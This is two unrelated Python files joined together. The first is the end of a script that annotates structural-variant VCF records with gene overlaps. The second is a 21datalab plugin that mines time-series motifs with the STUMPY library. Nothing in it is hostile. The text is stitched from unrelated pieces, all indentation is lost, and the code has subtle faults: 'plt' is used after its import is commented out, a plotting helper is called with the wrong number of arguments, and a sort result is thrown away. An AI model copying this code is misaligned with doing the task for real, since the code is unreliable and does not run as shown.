rec.info['GENELISTbtwBP'] = getGenesOverlappinRegion(rec, genes).replace(" ","")
# creating the BedTool object with only one locus defined within (LR is Left Region of the SV, RR is Right Region)
LR = pybedtools.BedTool(' '.join([chr1, str(POS1 - 1), str(POS1)]), from_string=True)
RR = pybedtools.BedTool(' '.join([chr2, str(POS2 - 1), str(POS2)]), from_string=True)
## getting the gene annotations for the isec, the upstream and the downstream genes and ADDING these to the VCF Record (rec)
rec.info['RGENUPS'], rec.info['RGENISEC'], rec.info['RGENDNS'], \
rec.info['LGENUPS'], rec.info['LGENISEC'], rec.info['LGENDNS'] = getAnno(LR, RR, genes)
return str(rec)
##@@@@@@@@
## MAIN ##
##@@@@@@@@
if __name__ == "__main__":
# main(argv[0], argv[1:])
# exit()
processArgs(argv[0], argv[1:])
import time
from pybedtools import BedTool
global genes
print("sorting the annotation bedfile ... ")
genes = BedTool(annof).sort()
## we read the entire vcf file at once or we stream the record and process the extraction of the required info to annotate the breakpoints
vcfr = pysam.VariantFile(vcf, "r")
## updating header with new info Tags
vcfr = newHeaders(vcfr)
newheader = vcfr.header
## init list for new Variants
res = []
global my_list
my_list = [variant for variant in vcfr]
my_range = [i for i in range(len(my_list))]
from multiprocessing import Pool
import logging
try:
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
ncpus = multiprocessing.cpu_count()
pool = Pool(processes=ncpus) # start X worker processes
result_list = pool.map(func=annotateVariant_parallel, iterable=my_range)
time.sleep(2)
# print(logger)
finally:
pool.close()
pool.join()
# print("results list")
# print(type(result_list))
# print(len(result_list))
from operator import itemgetter
sorted(result_list,key=itemgetter(1,2))
# print([str(rec) for rec in result_list[0:2]])
write_new_vcf(vcf, newheader, result_list, outvcfname)
## Example of vcf record
# X 96655464 DEL00008569 T <DEL> . PASS
# PRECISE;SVTYPE=DEL;SVMETHOD=EMBL.DELLYv0.7.5;CHR2=X;ENDPOSSV=96781481;INSLEN=0;HOMLEN=3;PE=21;
# MAPQ=60;CT=3to5;CIPOS=-4,4;CIEND=-4,4;SR=7;SRQ=1;
# CONSENSUS=ACAGTGTACTATGTGATGTTTTGACATATGTATACCAAATCCATTTAGCACTTGGTAACAAAAGGTAAGAATAGACATTGAATACTGTACTATTTTTA;
# CE=1.87385;RDRATIO=0.257492;SOMATIC
# GT:GL:GQ:FT:RCL:RC:RCR:CN:DR:DV:RR:RV:RCALT:RDISTDISC1:RDISTDISC2:RCDIS1:RCDIS2
# 1/1:-17.8973,-1.80346,0:18:PASS:2439:1227:2350:1:2:21:0:6:27:690:704:21:21
# 0/0:0,-1.20172,-11.4976:12:LowQual:3039:6207:3199:2:16:0:4:0:0:-1:-1:0:0
|
#21datalabplugin
import numpy
from system import __functioncontrolfolder
from model import date2secs, secs2dateString, date2msecs
import dates
import copy
import remote
import pandas as pd
from remote import RemoteModel
#import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import matplotlib.dates as plotdates
import stumpy as stp
import scipy as scy
import time as ti
# use a list to avoid loading of this in the model as template
mycontrol = [copy.deepcopy(__functioncontrolfolder)]
mycontrol[0]["children"][-1]["value"]="threaded"
stumpyMinerTemplate = {
"name": "StumpyMiner",
"type": "folder",
"children":[
{
"name": "StumpyStump",
"type": "function",
"functionPointer": "stumpyAlgorithm.minerStumpy", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
{"name": "motif", "type": "referencer"}, # the one motif we are using
{"name": "widget","type":"referencer"} , # the widget to which this miner belongs which is used (to find the selected motif
{"name": "annotations","type":"folder"}, # the results
{"name": "results","type":"variable"}, # list of results
{"name": "Patternlength", "type": "variable", "value": 4},
{"name": "maxNumberOfMatches","type":"const","value":20}, # the maximum number of matches to avoid massive production of annotations
mycontrol[0]
]
},
{
"name": "StumpyMASS",
"type": "function",
"functionPointer": "stumpyAlgorithm.minerMass", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
{"name": "motif", "type": "referencer"}, # the original pattern to look for
{"name": "widget","type":"referencer"} , # the widget to which this miner belongs which is used (to find the selected motif
{"name": "annotations","type":"folder"}, # the results
{"name": "results","type":"variable"}, # list of results
{"name": "maxNumberOfMatches", "type": "const", "value": 10}, # the detection threshold
mycontrol[0]
]
},
{
"name": "update",
"type": "function",
"functionPointer": "stumpyAlgorithm.update", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
{"name":"autoStepSize","type":"const","value":True}, #set this to true to autoset the step size of the motif
__functioncontrolfolder
]
},
{
"name": "show",
"type": "function",
"functionPointer": "stumpyAlgorithm.show", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
__functioncontrolfolder
]
},
{
"name": "hide",
"type": "function",
"functionPointer": "stumpyAlgorithm.hide", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
__functioncontrolfolder
]
},
{
"name": "select",
"type": "function",
"functionPointer": "stumpyAlgorithm.select", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
__functioncontrolfolder
]
},
{
"name": "delete",
"type": "function",
"functionPointer": "stumpyAlgorithm.delete", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
__functioncontrolfolder
]
},
{
"name": "jump",
"type": "function",
"functionPointer": "stumpyAlgorithm.jump", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
{"name":"match","type":"variable"},
__functioncontrolfolder
]
},
{
"name": "init",
"type": "function",
"functionPointer": "stumpyAlgorithm.init", # filename.functionname
"autoReload": True, # set this to true to reload the module on each execution
"children": [
__functioncontrolfolder
]
},
{
"name": "progress",
"type": "observer",
"children": [
{"name": "enabled", "type": "const", "value": True}, # turn on/off the observer
{"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
{"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
{"name": "targets", "type": "referencer","references":["StumpyMiner.StumpyMASS.control.progress"]}, # pointing to the nodes observed
{"name": "properties", "type": "const", "value": ["value"]},
# properties to observe [“children”,“value”, “forwardRefs”]
{"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
{"name": "triggerSourceId", "type": "variable"},
# the sourceId of the node which caused the observer to trigger
{"name": "hasEvent", "type": "const", "value": True},
# set to event string iftrue if we want an event as well
{"name": "eventString", "type": "const", "value": "StumpyAlgorithm.progress"}, # the string of the event
{"name": "eventData", "type": "const", "value": {"text": "observer status update"}}
# the value-dict will be part of the SSE event["data"] , the key "text": , this will appear on the page,
]
},
{
"name": "userInteraction",
"type": "observer",
"children": [
{"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
{"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
{"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
{"name": "targets", "type": "referencer"}, # pointing to the nodes observed
{"name": "properties", "type": "const", "value": ["value"]},
{"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
{"name": "triggerSourceId", "type": "variable"},
{"name": "hasEvent", "type": "const", "value": True},
{"name": "eventString", "type": "const", "value": "global.timeSeries.values"}, # the string of the event
{"name": "eventData", "type": "const", "value": {"text": ""}}
]
},
{
"name": "userSelectMotif",
"type": "observer",
"children": [
{"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
{"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
{"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
{"name": "targets", "type": "referencer"}, # pointing to the nodes observed
{"name": "properties", "type": "const", "value": ["forwardRefs"]},
{"name": "onTriggerFunction", "type": "referencer"}, # the function(s) to be called when triggering
{"name": "triggerSourceId", "type": "variable"},
{"name": "hasEvent", "type": "const", "value": True},
{"name": "eventString", "type": "const", "value": "StumpyMiner.selectMotif"},
# the string of the event
{"name": "eventData", "type": "const", "value": {"text": ""}}
]
},
{
"name": "userChangeMotifSize",
"type": "observer",
"children": [
{"name": "enabled", "type": "const", "value": False}, # turn on/off the observer
{"name": "triggerCounter", "type": "variable", "value": 0}, # increased on each trigger
{"name": "lastTriggerTime", "type": "variable", "value": ""}, # last datetime when it was triggered
{"name": "targets", "type": "referencer"}, # pointing to the nodes observed
{"name": "properties", "type": "const", "value": ["value"]},
{"name": "onTriggerFunction", "type": "referencer","references":["StumpyMiner.recreate"]}, # the function(s) to be called when triggering
{"name": "triggerSourceId", "type": "variable"},
{"name": "hasEvent", "type": "const", "value": False},
{"name": "eventString", "type": "const", "value": "StumpyMiner.motifSize"},
# the string of the event
{"name": "eventData", "type": "const", "value": {"text": ""}}
]
},
{"name":"defaultParameters","type":"const","value":{"filter":[0,20,2],"samplingPeriod":[1,60,10],"freedom":[0,1,0.3],"dynamicFreedom":[0,1,0.5],"numberSamples":[1,100,1],"step":[0,1,0.1]}}, # the default contain each three values: min,max,default
{"name": "cockpit", "type": "const", "value": "/customui/stumpyminer.htm"} #the cockpit for the motif miner
]
}
def my_date_format(epoch):
dat = dates.epochToIsoString(epoch,zone='Europe/Berlin')
my = dat[0:10]+"  "+dat[11:19]
return my
def stumpy_mass_min(querySeriesValues, timeSeriesValues):
distance_profile = stp.core.mass(querySeriesValues, timeSeriesValues)
min = numpy.argsort(distance_profile)
return min
def stumpy_mass_hits(querySeriesValues, timeSeriesValues):
"""
:param querySeries: a subsequence (e.g., motif annotation) of the full time series - named query
:param timeSeries: a time series (full time series) - given as numpy series
:return: distance profile - as numpy.ndarray
"""
distance_profile = stp.core.mass(querySeriesValues, timeSeriesValues)
print('finished - tpye: ', type(distance_profile))
idx = numpy.argmin(distance_profile)
numpy.sort(distance_profile)
idx_sorted = numpy.argsort(distance_profile)
# nearest neightbor to query (subsequence) is at idx position
#return idx
return idx_sorted
# optional usage for local plotting
def stumpy_stump_print_z_normalized(fullTimeSeriesValues, fullTimeSeriesTimes, patternLength, idxMotif, idxNearestN):
"""
:param querySeries: a subsequence (motif), which is a subsequence of the full time series (like mass)
:param timeSeries: a time series (full time series) (like mass)
:param idx: index - position nearest neightbor to query (result of stumpy_mass function
:return:
"""
#plt.rcParams["figure.figsize"] = [20, 6] # width, height
plt.rcParams['xtick.direction'] = 'out'
motif1Values = fullTimeSeriesValues[idxMotif:idxMotif+patternLength]
motif2Values = fullTimeSeriesValues[idxNearestN: idxNearestN+patternLength]
motif1Norm = stp.core.z_norm(motif1Values)
motif2Norm = stp.core.z_norm(motif2Values)
fullTimeSeriesNorm = stp.core.z_norm(fullTimeSeriesValues)
fig = plt.figure()
plt.suptitle('Comparing all similarities', fontsize='30')
plt.xlabel('Time', fontsize ='20')
plt.ylabel('Motif Variable', fontsize='20')
plt.plot(fullTimeSeriesNorm, lw=2, color = "grey", label="Time series")
plt.plot(motif1Norm, lw=2, color="red", label="Motif")
plt.plot(motif2Norm, lw=2, color="orange", label="Motif Nearest")
plt.legend()
plt.savefig('Stump_Motif.png')
plt.close(fig)
return True
# optional usage for local plotting
def stumpy_print_z_normalized(querySeriesValues, timeSeriesValues, timeSeriesTimes, idx):
"""
:param querySeries: a subsequence (motif), which is a subsequence of the full time series (like mass)
:param timeSeries: a time series (full time series) (like mass)
:param idx: index - position nearest neightbor to query (result of stumpy_mass function
:return:
"""
plt.rcParams['xtick.direction'] = 'out'
# Since MASS computes z-normalized Euclidean distances,
# we should z-normalize our subsequences before plotting
querylength = querySeriesValues.size
querySeriesValues_norm = stp.core.z_norm(querySeriesValues)
timeSeriesValues_norm = stp.core.z_norm(timeSeriesValues[idx:idx+querylength])
fig = plt.figure()
plt.suptitle('Comparing The Query To Its Nearest Neighbor', fontsize='30')
plt.xlabel('Time', fontsize ='20')
plt.ylabel('Motif Variable', fontsize='20')
plt.plot(timeSeriesValues_norm, lw=2, color = "red", label="Nearest Neighbor")
plt.plot(querySeriesValues_norm, lw=2, color="blue", label="Query , querySeries")
plt.legend()
plt.savefig('MassRest_Light.png')
plt.close(fig)
return True
def stumpy_stump(timeSeries, patternLength):
"""
:param timeSeries: a time series given as numpy series
:param patternLength: length of the pattern for similarity, i.e., the size of the search window (sliding window) as integer
:return: the motif index
Note: The motif index is the result based on
the z-normalized matrix profile (first column: matrix profile, second column: indices of each profile,
third column: indices of left (next) profile, fourth column: indices of right (next) profile
(--> all indices refer to the timeSeries, which is the full time series)
"""
matrixProfile = stp.stump(timeSeries, patternLength)
motifIndex = numpy.argsort(matrixProfile[:, 0])[0]
# sort all z-normalized distances (first column) and select the lowest value (--> best match)
print('motif index is : ', motifIndex, ' and nearest neightbor is: ' ,matrixProfile[motifIndex,1])
stumpy_stump_print_z_normalized(timeSeries, patternLength, motifIndex, matrixProfile[motifIndex,1])
return motifIndex
def minerStump(functionNode):
logger = functionNode.get_logger()
logger.info("==>>>> in stumpy stump miner " + functionNode.get_browse_path())
signal = functionNode.get_child("control.signal")
progressNode = functionNode.get_child("control").get_child("progress")
progressNode.set_value(0)
signal.set_value(None)
functionNode.get_child("results").set_value([])
functionNode.get_child("results").set_value([])
model=functionNode.get_model() ## is occupancyDemo
motifNode = functionNode.get_child("motif").get_target()
varNode = motifNode.get_child("variable").get_target() ### variable
startTime = motifNode.get_child("startTime").get_value()
endTime = motifNode.get_child("endTime").get_value()
timeSeries = varNode.get_time_series(start=startTime, end=endTime)
patternlength = functionNode.get_child("Patternlength").get_value()
if functionNode.get_child("maxNumberOfMatches"):
maxMatches = functionNode.get_child("maxNumberOfMatches").get_value()
else:
maxMatches = None
fullTimeSeries = varNode.get_time_series()
fullTimeSeriesValues = fullTimeSeries['values']
stumpIndex = stumpy_stump(fullTimeSeriesValues, patternlength)
print("index position: ", stumpIndex)
return True
# the modified implementation of the minerMass algorithm SPLITS the full time series into TWO parts:
# (i) one part before the motif and (ii) one part after the motif (more of user interest)
def minerMass(functionNode):
logger = functionNode.get_logger()
logger.info("==>>>> in stumpy mass split miner " + functionNode.get_browse_path())
progressNode = functionNode.get_child("control").get_child("progress")
progressNode.set_value(0)
signal = functionNode.get_child("control.signal")
signal.set_value(None)
functionNode.get_child("results").set_value([])
motifNode = functionNode.get_child("motif").get_target()
varNode = motifNode.get_child("variable").get_target()
startTime = motifNode.get_child("startTime").get_value()
endTime = motifNode.get_child("endTime").get_value()
actualMatches_before = 0
actualMatches_after = 0
if functionNode.get_child("maxNumberOfMatches"):
maxMatches = functionNode.get_child("maxNumberOfMatches").get_value()
else:
maxMatches = None
maxMatches_before = round(maxMatches /4) # roughly 25 % of the matches will be in the pattern before the motif
maxMatches_after = round(maxMatches / 4 * 3) # the remaining matches are afterwards
queryTimeSeries = varNode.get_time_series(start=startTime, end=endTime)
fullTimeSeries = varNode.get_time_series()
queryTimeSeriesTimes = queryTimeSeries['__time']
fullTimeSeriesTimes = fullTimeSeries['__time']
endLeftPartTs = (numpy.where(fullTimeSeriesTimes == queryTimeSeriesTimes[0]))[0][0]
startRightPartTs = (numpy.where(fullTimeSeriesTimes == queryTimeSeriesTimes[len(queryTimeSeriesTimes) - 1]))[0][0]
queryTimeSeriesValues = queryTimeSeries['values']
queryLength = queryTimeSeriesValues.size
fullTimeSeriesValues = fullTimeSeries['values']
timeSeriesLeftValues = fullTimeSeriesValues[:endLeftPartTs]
timeSeriesRightValues = fullTimeSeriesValues[startRightPartTs:]
timeSeriesLeftTimes = fullTimeSeriesTimes[:endLeftPartTs]
timeSeriesRightTimes = fullTimeSeriesTimes[startRightPartTs:]
profile_before = stp.core.mass(queryTimeSeriesValues, timeSeriesLeftValues, normalize=True)
profile_after = stp.core.mass(queryTimeSeriesValues, timeSeriesRightValues, normalize=True)
maxValue_before = numpy.max(profile_before)
profile_before = numpy.where(profile_before < 0.05, maxValue_before, profile_before)
maxValue_after = numpy.max(profile_after)
profile_after = numpy.where(profile_after < 0.05, maxValue_after, profile_after)
# peaks_before, _ = scy.signal.find_peaks(-profile_before, distance=round(queryLength / 12), width = round(queryLength / 10), threshold=0.07)
# peaks_after, _ = scy.signal.find_peaks(-profile_after, distance=round(queryLength / 12 ), width = round(queryLength / 10), threshold = 0.07)
peaks_before, _ = scy.signal.find_peaks(-profile_before, distance=round(queryLength / 12), width = round(queryLength / 10))
peaks_after, _ = scy.signal.find_peaks(-profile_after, distance=round(queryLength / 12 ), width = round(queryLength / 10))
# profile (before / after) peaks --> the profile values (at peak positions)
profile_before_peaks = profile_before[peaks_before]
profile_after_peaks = profile_after[peaks_after]
sorted_peaks_before = numpy.argsort(profile_before_peaks)
sorted_peaks_after = numpy.argsort(profile_after_peaks)
sorted_peaks_full_before = []
for idx_short in range(len(sorted_peaks_before)):
sorted_peaks_full_before.append(peaks_before[sorted_peaks_before[idx_short]])
sorted_peaks_full_after = []
for idx_short in range(len(sorted_peaks_after)):
sorted_peaks_full_after.append(peaks_after[sorted_peaks_after[idx_short]])
matches = []
actualMatches_before = len(sorted_peaks_before)
actualMatches_after = len(sorted_peaks_after)
matches_after = []
matches_before = []
last = 0
for j in range(min(maxMatches_after, actualMatches_after)):
matches_after.append({
"startTime": dates.epochToIsoString((timeSeriesRightTimes)[sorted_peaks_full_after[j]]),
"endTime": dates.epochToIsoString((timeSeriesRightTimes)[sorted_peaks_full_after[j] + queryLength]),
"match": (profile_after[peaks_after])[sorted_peaks_after[j]],
"epochStart": (timeSeriesRightTimes)[sorted_peaks_full_after[j]],
"epochEnd": (timeSeriesRightTimes)[sorted_peaks_full_after[j] + queryLength],
"offset": 0,
"format": my_date_format(
(timeSeriesRightTimes)[sorted_peaks_full_after[j]]) + "  (match=%2.3f)" %
(profile_after[peaks_after])[sorted_peaks_after[j]]
})
progress = round(float(j) / maxMatches_after * 15)
if progress != last:
progressNode.set_value(float(j) / maxMatches_after)
last = progress
if signal.get_value() == "stop":
break
for j in range(min(maxMatches_before, actualMatches_before)):
matches_before.append({
"startTime": dates.epochToIsoString((timeSeriesLeftTimes)[sorted_peaks_full_before[j]]),
"endTime": dates.epochToIsoString((timeSeriesLeftTimes)[sorted_peaks_full_before[j] + queryLength]),
"match": (profile_before[peaks_before])[sorted_peaks_before[j]],
"epochStart": (timeSeriesLeftTimes)[sorted_peaks_full_before[j]],
"epochEnd": (timeSeriesLeftTimes)[sorted_peaks_full_before[j] + queryLength],
"offset": 0,
"format": my_date_format(
(timeSeriesLeftTimes)[sorted_peaks_full_before[j]]) + "  (match=%2.3f)" %
(profile_before[peaks_before])[sorted_peaks_before[j]]
})
progress = round(float(j) / maxMatches_before * 15)
if progress != last:
progressNode.set_value(float(j) / maxMatches_before)
last = progress
if signal.get_value() == "stop":
break
idx_before = 0
idx_after = 0
while idx_before < len(matches_before) and idx_after < len(matches_after):
if (matches_before[idx_before])['match'] < (matches_after[idx_after])['match']:
matches.append(matches_before[idx_before])
idx_before = idx_before + 1
else:
matches.append(matches_after[idx_after])
idx_after = idx_after + 1
while idx_after < len(matches_after):
matches.append(matches_after[idx_after])
idx_after = idx_after + 1
while idx_before < len(matches_before):
matches.append(matches_before[idx_before])
idx_before = idx_before +1
functionNode.get_child("results").set_value(matches)
show_timeseries_results(functionNode)
progressNode.set_value(1)
return True
def stumpy_print_labeled_2_axis(querySeriesValues, timeSeriesValues, idx, label, varName):
fig, ax1 = plt.subplots()
# plt.clf()
ax1.set_xlabel('Time', fontsize ='12')
ax1.set_ylabel('Motif / query ', fontsize='12', color = 'blue')
ax1.plot(querySeriesValues, lw=2, color="blue", label="Query z-norm")
ax1.tick_params(axis='y', labelcolor='blue')
ax2 = ax1.twinx() ### instantiate a scondary axis that shares the same x-axis
ax2.set_ylabel('TS match (excerpt TS)', fontsize='12', color = 'red')
ax2.plot(timeSeriesValues, lw=2, color = "red", label="TS z-norm")
ax2.tick_params(axis='y', labelcolor='red')
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.legend()
plt.savefig('C:/Users/viggroen/OneDrive - <NAME> AG/41_ML_Projects/11_21data-lab_workbench_AnalyticTool/Tasks_AP-work/STUMPY/MASS/M_org_' + varName + '_' + label + '.png')
plt.close(fig)
plt.cla()
plt.clf()
return True
def show_timeseries_results(functionNode):
results = functionNode.get_child("results").get_value()
motifNode = functionNode.get_child("motif").get_target()
startTime = motifNode.get_child("startTime").get_value()
endTime = motifNode.get_child("endTime").get_value()
varNode = motifNode.get_child("variable").get_target()
motifTimeSeries = varNode.get_time_series(start=startTime, end=endTime)
varName = varNode.get_property("name")
for child in functionNode.get_children():
if child.get_name().endswith("_expected"):
if not child.get_name().startswith(varName):
child.delete()
resultNode = functionNode.create_child(name=varName+'_expected', type="timeseries")
resultNode.set_time_series([],[])
cnt = 0
for result in results:
resultTimes = motifTimeSeries['__time']+result['epochStart']-date2secs(startTime) # time + offset
resultValues = (motifTimeSeries['values']).copy()
lastIdx = len(resultTimes)-1
### for each result
excerptFullTs = varNode.get_time_series(start=result['startTime'], end=result['endTime'])
excerptFullTsValues = (excerptFullTs['values'])[:-1]
# stumpy_print_labeled_2_axis(resultValues, excerptFullTsValues, cnt, str(cnt), varName)
#resultValuesNorm = mixed_norm_cross(resultValues, excerptFullTsValues)
resultValuesNorm = std_norm(resultValues, excerptFullTsValues) #kna
resultValuesNormNan = resultValuesNorm.copy()
resultValuesNormNan = numpy.insert(resultValuesNormNan,0, numpy.nan)
resultValuesNormNan = numpy.append(resultValuesNormNan, numpy.nan)
resultTimesNan = resultTimes.copy()
resultTimesNan = numpy.insert(resultTimesNan, 0, resultTimes[0]+resultTimes[0]-resultTimes[1])
resultTimesNan = numpy.append(resultTimesNan, resultTimes[lastIdx]+resultTimes[lastIdx]-resultTimes[lastIdx-1])
cnt = cnt + 1
#to avoid overlaps with old results (which can happen if results actually overlap), delete first
resultNode.delete_time_series(start = resultTimesNan[0],end=resultTimesNan[-1]) #kna
resultNode.insert_time_series(values=resultValuesNormNan, times=resultTimesNan)
widgetNode = functionNode.get_child("widget").get_target()
widgetNode.get_child("selectedVariables").add_references(resultNode,allowDuplicates=False)
def hide_timeseries_results(functionNode, delete=False):
for child in functionNode.get_children():
if child.get_name().endswith("_expected"):
widgetNode = functionNode.get_child("widget").get_target()
widgetNode.get_child("selectedVariables").del_references(child)
def z_norm_cross(motifTsValues, excerptFullTsValues):
avgFullTs = numpy.mean(excerptFullTsValues)
varianceFullTs = numpy.var(excerptFullTsValues)
return (motifTsValues - avgFullTs) / varianceFullTs
def correlation_norm(resultValues, excerptFullTsValues):
cor = numpy.correlate(resultValues, excerptFullTsValues)
cov = numpy.cov(resultValues, excerptFullTsValues)
return (resultValues / cor)
def mixed_norm_cross(motifTsValues, excerptFullTsValues):
maxValueMotif = numpy.max(motifTsValues)
minValueMotif = numpy.min(motifTsValues)
deltaMotif = maxValueMotif - minValueMotif
minValueTs = numpy.min(excerptFullTsValues)
maxValueTs = numpy.max(excerptFullTsValues)
deltaTs = maxValueTs - minValueTs
# two steps towards visualization: (i) shift (tackle offset) and (ii) scaling (e.g., shrinking) wrt. min-max difference / span
# (i) shift
shift = numpy.median(motifTsValues) - numpy.median(excerptFullTsValues) # is the distance of media
# (ii) scaling
scale = (motifTsValues - numpy.median(motifTsValues)) * deltaTs / deltaMotif # distance from median is scaled (stretched or compressed)
return motifTsValues - shift * 0.6 - scale * 0.6
def std_norm(motifTsValues,targetValues):
meanMotif = numpy.mean(motifTsValues)
stdMotif = numpy.std(motifTsValues)
meanTarget = numpy.mean(targetValues)
stdTarget = numpy.std(targetValues)
return (motifTsValues-meanMotif)*(stdTarget/stdMotif)+(meanTarget)
def mean_norm(nanResultValues):
averageVal = numpy.mean(nanResultValues)
span = numpy.max(nanResultValues) - numpy.min(nanResultValues)
res = nanResultValues - averageVal
res = res / abs(span)
return res
def min_max_norm(nanResultValues):
v1 = nanResultValues - numpy.min(nanResultValues)
divisor = (numpy.max(nanResultValues) - numpy.min(nanResultValues))
res = v1 / divisor
return res
def min_max_norm_cross(motifTsValues, excerptFullTsValues, verticalDistance):
avgFullTs = numpy.mean(excerptFullTsValues)
spanFullTs = numpy.max(excerptFullTsValues) - numpy.min(excerptFullTsValues)
res = motifTsValues + verticalDistance
res = res - avgFullTs
res = res / abs(spanFullTs)
return res
def enable_interaction_observer(functionNode):
motif=functionNode.get_parent().get_child("StumpyMASS.motif").get_target()
observer = functionNode.get_parent().get_child("userInteraction")
observer.get_child("enabled").set_value(False)
newRefs = [child for child in motif.get_child("envelope").get_children() if child.get_type()=="timeseries"]
observer.get_child("targets").add_references(newRefs,deleteAll=True)
observer.get_child("enabled").set_value(True)
def disable_interaction_observer(functionNode):
observer = functionNode.get_parent().get_child("userInteraction")
observer.get_child("enabled").set_value(False)
def enable_motif_select_observer(functionNode):
disable_motif_select_observer(functionNode) #make sure all are initially off
widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
selected = widget.get_child("hasAnnotation.selectedAnnotations")
selectObserver = functionNode.get_parent().get_child("userSelectMotif")
selectObserver.get_child("targets").add_references([selected],deleteAll=True)
selectObserver.get_child("enabled").set_value(True)
#if there is a selected motif, initially trigger this to set the UI correctly
if selected.get_targets()!=[]:
model = functionNode.get_model()
model.notify_observers(selected.get_id(), "forwardRefs")
def disable_motif_select_observer(functionNode):
functionNode.get_parent().get_child("userSelectMotif").get_child("enabled").set_value(False)
def disable_motif_change_size_observer(functionNode):
functionNode.get_parent().get_child("userChangeMotifSize").get_child("enabled").set_value(False)
def enable_motif_change_size_observer(functionNode,motif):
observer = functionNode.get_parent().get_child("userChangeMotifSize")
observer.get_child("enabled").set_value(False)
observer.get_child("targets").add_references([motif.get_child("startTime")],deleteAll=True)
observer.get_child("enabled").set_value(True)
def init(functionNode):
logger = functionNode.get_logger()
logger.debug("init")
enable_motif_select_observer(functionNode)
show_motifs(functionNode,True)
return True
def hide_motif(functionNode):
widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
disable_interaction_observer(functionNode)
disable_motif_select_observer(functionNode)
disable_motif_change_size_observer(functionNode)
motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
return _connect(motif,widget,False)
def select(functionNode):
logger = functionNode.get_logger()
widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
newMotif = widget.get_child("hasAnnotation").get_child("selectedAnnotations").get_target()
if not newMotif:
logger.error("no new motif given")
return False
motifPointer = functionNode.get_parent().get_child("StumpyMASS").get_child("motif")
motifPointer.add_references(newMotif,deleteAll=True)
return True
def jump(functionNode):
widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
widgetStartTime = dates.date2secs(widget.get_child("startTime").get_value())
widgetEndTime = dates.date2secs(widget.get_child("endTime").get_value())
#now get the user selection, it will be the index of the results list
matchIndex=int(functionNode.get_child("match").get_value())
if matchIndex==-1:
motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
match = {}
match["epochStart"] = dates.date2secs(motif.get_child("startTime").get_value())
match["epochEnd"] = dates.date2secs(motif.get_child("endTime").get_value())
else:
results = functionNode.get_parent().get_child("StumpyMASS").get_child("results").get_value()
match = results[matchIndex]
middle = match["epochStart"]+(match["epochEnd"]-match["epochStart"])/2
newStart = middle - (widgetEndTime-widgetStartTime)/2
newEnd = middle + (widgetEndTime - widgetStartTime) / 2
widget.get_child("startTime").set_value(dates.epochToIsoString(newStart))
widget.get_child("endTime").set_value(dates.epochToIsoString(newEnd))
return True
def display_matches(functionNode,on=True):
return
def enable_show_motifs(functionNode):
widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
def show_motifs(functionNode,show):
widget = functionNode.get_parent().get_child("StumpyMASS.widget").get_target()
visibleElements = widget.get_child("visibleElements").get_value()
if "motifs" not in visibleElements:
return
if show != visibleElements["motifs"]:
visibleElements["motifs"]=show
widget.get_child("visibleElements").set_value(visibleElements)
return
def hide(functionNode):
miningNode = functionNode.get_parent().get_child("StumpyMASS")
hide_timeseries_results(miningNode)
show_motifs(functionNode, False)
def _create_annos_from_matches(annoFolder,matches,maxMatches=None):
for child in annoFolder.get_children():
child.delete()
if maxMatches == 0:
return #we don't write any annotation
if maxMatches and maxMatches<len(matches):
matches = matches[0:maxMatches]
for m in matches:
newAnno = annoFolder.create_child(type="annotation")
anno = {"type":"time",
"startTime":m["startTime"],
"endTime":m["endTime"],
"tags":["pattern_match"]}
for k, v in anno.items():
newAnno.create_child(properties={"name": k, "value": v, "type": "const"})
def delete(functionNode):
hide_motif(functionNode)
motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
#motif.get_child("envelope").delete()
#remove all envelope info from the motif
return True
def _connect(motif,widget,connect=True):
if not motif or not widget:
return False
try:
lMax = None
lMin = None
exPe = None
if motif.get_child("envelope"):
for child in motif.get_child("envelope").get_children():
if "_limitMax" in child.get_name():
lMax = child
elif "_limitMin" in child.get_name():
lMin = child
elif "_expected" in child.get_name():
exPe = child
if connect:
if lMax and lMin:
if exPe:
widget.get_child("selectedVariables").add_references([exPe,lMin,lMax],allowDuplicates=False)
else:
widget.get_child("selectedVariables").add_references([lMin, lMax],allowDuplicates=False)
else:
#disconnect
elems = [elem for elem in [lMin,lMax,exPe] if elem] #remove the nones
if elems:
widget.get_child("selectedVariables").del_references(elems)
return True
except Exception as ex:
import traceback
print(traceback.format_exc())
return True
def update(functionNode,startTime=0):
if functionNode.get_name()!="update":
functionNode = functionNode.get_parent().get_child("update")
motif = functionNode.get_parent().get_child("StumpyMASS").get_child("motif").get_target()
widget = functionNode.get_parent().get_child("StumpyMASS").get_child("widget").get_target()
logger = functionNode.get_logger()
start = dates.date2secs(motif.get_child("startTime").get_value())
end = dates.date2secs(motif.get_child("endTime").get_value())
times = numpy.arange(start, end)
ts = motif.get_child("variable").get_target().get_time_series(start,end,resampleTimes = times)
data = ts["values"]
if startTime!=0:
diff = startTime-start
times=times+diff
#value offset
